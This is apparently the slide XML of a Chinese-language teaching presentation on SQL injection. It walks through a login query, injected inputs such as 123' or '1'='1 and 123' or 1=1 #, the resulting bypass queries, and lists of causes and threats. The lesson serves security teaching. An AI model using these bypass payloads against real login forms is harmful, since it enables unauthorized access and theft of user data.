          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15364" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2376805" y="892175"/>
            <a:ext cx="8770620" cy="1666875"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" anchor="t" anchorCtr="0"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="685800" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" kern="1200" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>假设这么一个情景，一个网页的后台入口处需要验证用户名和密码：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1" kern="1200" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15366" name="矩形 1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2552700" y="4189730"/>
            <a:ext cx="8342630" cy="718185"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="t" anchorCtr="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="228600" lvl="0" indent="-228600" algn="l" defTabSz="685800">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>如果用户填写的用户名和密码都是: 123 </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一个简单的小例子</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="文本框 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2552700" y="4745990"/>
            <a:ext cx="9265285" cy="1849120"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="171450" marR="0" lvl="0" indent="-171450" algn="l" defTabSz="685800" rtl="0" eaLnBrk="1" fontAlgn="base" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="750"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>验证程序的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>语句是这样写：</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="2400" b="1"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171450" marR="0" lvl="0" indent="-171450" algn="l" defTabSz="685800" rtl="0" eaLnBrk="1" fontAlgn="base" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="750"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>select * from users where username</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"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=‘123’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"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and</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"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pass</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>word=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"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‘123’</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="24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anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="7" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="153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additive="base">
                                        <p:cTn id="11" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="15362"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="12"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 calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="17" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="15366"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="1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p:bldP spid="15366"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一个简单的小例子</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="文本框 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2215515" y="1100455"/>
            <a:ext cx="8024495" cy="645160"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" defTabSz="685800" rtl="0" eaLnBrk="1" fontAlgn="base" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="750"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>如果用户填写的用户名和密码都是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>: 123’ or ‘1’=‘1</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2357120" y="1850390"/>
            <a:ext cx="8425815" cy="829945"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="685800" eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>select * from users where username='123' or '1'='1' and password='123' or '1'='1'</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="文本框 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2363470" y="3106420"/>
            <a:ext cx="8024495" cy="645160"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" defTabSz="685800" rtl="0" eaLnBrk="1" fontAlgn="base" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="750"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>如果用户填写的用户名和密码都是: 123’ or 1=1 #</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363470" y="4025900"/>
            <a:ext cx="9212580" cy="829945"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" algn="l" defTabSz="685800">
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>select * from users where username='123' or 1=1 #' and password='123' or 1=1 #'</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="矩形 1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3700780" y="5574665"/>
            <a:ext cx="5349875" cy="718185"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="t" anchorCtr="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="228600" lvl="0" indent="-228600" algn="l" defTabSz="685800">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>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请问能成功登录系统吗？</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="图片 9"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4700356" y="-23935"/>
            <a:ext cx="7286625" cy="1095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27860" y="0"/>
            <a:ext cx="9648190" cy="781685"/>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p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2215687" y="9629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SQL注入原因</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="文本框 8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1927860" y="1191260"/>
            <a:ext cx="9935845" cy="4521835"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>为什么发生</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>注入攻击</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>？ </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>代码对输入</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>语句的参数过滤不严格</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>未启用框架的安全配置</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>，例如：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1"/>
              <a:t>PHP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>的magic_quotes_gpc未设置为On</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>     在magic_quotes_gpc=On的情况下，如果输入的数据有单引号（’）、 双引号（”）、反斜线（）与 NUL（NULL 字符）等字符都会被加上反斜线。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>未使用框架安全的查询方法</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>，比如</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1"/>
              <a:t>:PHP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>查询条件尽量使用数组方式</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>服务器未启用防火墙</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>服务器未启用其他安全防护设备</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="24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8417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SQL注入威胁表现</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="文本框 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2072005" y="781685"/>
            <a:ext cx="9504045" cy="5077460"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>SQL注入威胁表现形式可以体现为以下几点：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>获取数据库信息</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>管理员</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>后台用户名和密码</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>获取其他数据库</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>敏感信息</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>：用户名、密码、手机号码、身份证、银行卡信息……</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>整个数据库</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>脱裤</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
